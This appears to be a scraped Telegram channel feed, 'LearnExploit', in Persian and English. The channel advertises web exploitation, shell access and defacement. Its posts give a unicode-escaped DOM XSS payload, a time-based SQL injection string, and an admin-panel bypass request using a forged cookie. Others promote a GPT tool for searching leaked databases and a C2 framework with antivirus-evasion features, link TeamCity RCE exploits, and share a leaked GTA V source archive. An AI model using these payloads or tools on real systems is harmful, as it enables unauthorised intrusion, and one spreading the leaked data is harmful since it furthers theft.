0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
تلگرام پریمیوم یک ساله
به صورت گیفت
قیمت ۹۹۵ تومن
جهت تهیه پیام بدید :
@IRDefacer
XSS of the day : DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Nuclei tamplete

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
6❤‍🔥3
SQL Injection

After this, I used ghauri to extract the database It was successful

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--

#SQL #Injection #ghauri #BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
8🔥3👍21
👻 DarkGPT 👻

💬
DarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.

👁‍🗨 Prerequisites:
⚪️ Python 3.8 +

🔼 Environment Setup:
cd DarkGPT
mv .example.env .env
vim .env


DEHASHED_API_KEY="your_dehashed_api_key_here"
DEHASHED_USERNAME="your_dehashed_username"
OPENAI_API_KEY="API_KEY from openai.com"

pip install -r requirements.txt
python3 main.py


😸 Github

⬇️ Download
🔒 LearnExploit

#Dark #GPT

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
64🔥3❤‍🔥1👍1
🦈 Wireshark 🦈

(4.2.4) has been released. Enjoy.

#Wireshark #Released

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥821
اگر یادتون باشه ۳ ماه پیش سورس کد های GTA V با هک شدن راکستار لیک شد که داخل چنلم هست فایلش مثه اینکه یه گروه قراره GTA برای اندروید پورت کنن ⚡️

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥171
GTAVSP.7z.002
2.2 GB
فایل های GTA V

#Data #GTA #Leak
——————‌
0Day.Today
@LearnExploit
@Tech_Army
8🔥5👍2👎1
احتمالا درآمدزایی از تلگرام به زودی برای همه کانال های بالای ۱۰۰۰ هزار عضو فعال شود .
در تصاویر بالا پنل درآمدزایی تلگرام رو مشاهده می‌کنید.

طیق اعلام تلگرام، ۵۰ درصد از پرداختی تبلیغات نمایش داده شده به صاحب کانال ها میرسد.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4👍3
#خبر

ظاهرا توی ورژن های 5.6.0 و 5.6.1 پکیج xz یه backdoor پیدا شده و توصیه میشه به ورژن جدید آپگرید کنید ⚠️:
# pacman -Syu

توضیحات تکمیلی:
Source 01 https://archlinux.org/news/the-xz-package-has-been-backdoored/

Source 02
https://www.openwall.com/lists/oss-security/2024/03/29/4



IR0Day.Today Bax
@LearnExploit
3
PoshC2

PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement.

💬
PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools, allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python2/Python3 implants with payloads written in PowerShell v2 and v4, C++ and C# source code, a variety of executables, DLLs and raw shellcode in addition to a Python2/Python3 payload. These enable C2 functionality on a wide range of devices and operating systems, including Windows, *nix and OSX.

📊 Other notable features of PoshC2 include:
⚪️ Consistent and Cross-Platform support using Docker.
⚪️ Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
⚪️ A large number of payloads generated out-of-the-box which are frequently updated.
⚪️ Shellcode containing in-build AMSI bypass and ETW patching for a high success rate and stealth.
⚪️ Auto-generated Apache Rewrite rules for use in a C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
⚪️ A modular and extensible format allowing users to create or edit C#, PowerShell or Python3 modules which can be run in-memory by the Implants.
⚪️ Notifications on receiving a successful Implant via Pushover or Slack.
⚪️ A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history and suggestions.
⚪️ Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
⚪️ Client/Server format allowing multiple team members to utilise a single C2 server.
⚪️

😸 Github

⬇️ Download
🔒 LearnExploit

#Payload #C2 #Proxy #Aware

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥421
find an admin panel bypass using (admin=1).

/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value)  -->  Set-Cookie:admin=;

Bypass request:

GET /admin HTTP/1.1
Cookie:admin=1;

#Trick #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍6🔥31😁1
CVE-2024-3094 - An ssh honeypot with the XZ backdoor.

Github

#CVE #Honeypot #Backdoor
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥3
CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit

Github

Github

#exploit #Cve #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍5❤‍🔥1